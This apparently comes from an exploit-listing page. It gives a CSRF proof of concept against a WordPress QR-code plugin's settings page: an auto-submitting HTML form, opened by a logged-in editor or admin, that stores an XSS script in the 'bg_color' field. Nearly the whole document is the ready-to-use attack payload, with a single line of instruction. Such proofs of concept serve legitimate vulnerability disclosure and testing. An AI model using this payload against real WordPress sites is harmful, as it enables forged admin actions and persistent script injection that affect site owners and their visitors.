Share 
## https://sploitus.com/exploit?id=WPEX-ID:A70AD549-2E09-44FB-B894-4271AD4A84F6
Make a logged in editor or admin open a page with the below payload

<html><form enctype="multipart/form-data" method="POST" action="https://<WordPress-Site>/wp-admin/admin.php?page=my-unique-qr-code" id="csrfpoc"><table><tr><td>checkbox-nested-2</td><td><input type="text" value="on" name="checkbox-nested-2"></td></tr>
<tr><td>bg_color</td><td><input type="text" value="&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;script&gt;alert(/XSS/)&lt;/script&gt;" name="bg_color" size="40"></td></tr>
<tr><td>colorDark</td><td><input type="text" value="#000000" name="colorDark"></td></tr>
<tr><td>colorLight</td><td><input type="text" value="#ffffff" name="colorLight"></td></tr>
<tr><td>width</td><td><input type="text" value="200" name="width"></td></tr>
<tr><td>height</td><td><input type="text" value="200" name="height"></td></tr>
<tr><td>urlinqrcoed-submit</td><td><input type="text" value="Save" name="urlinqrcoed-submit"></td></tr>
</table></form><script>csrfpoc.submit()</script></html>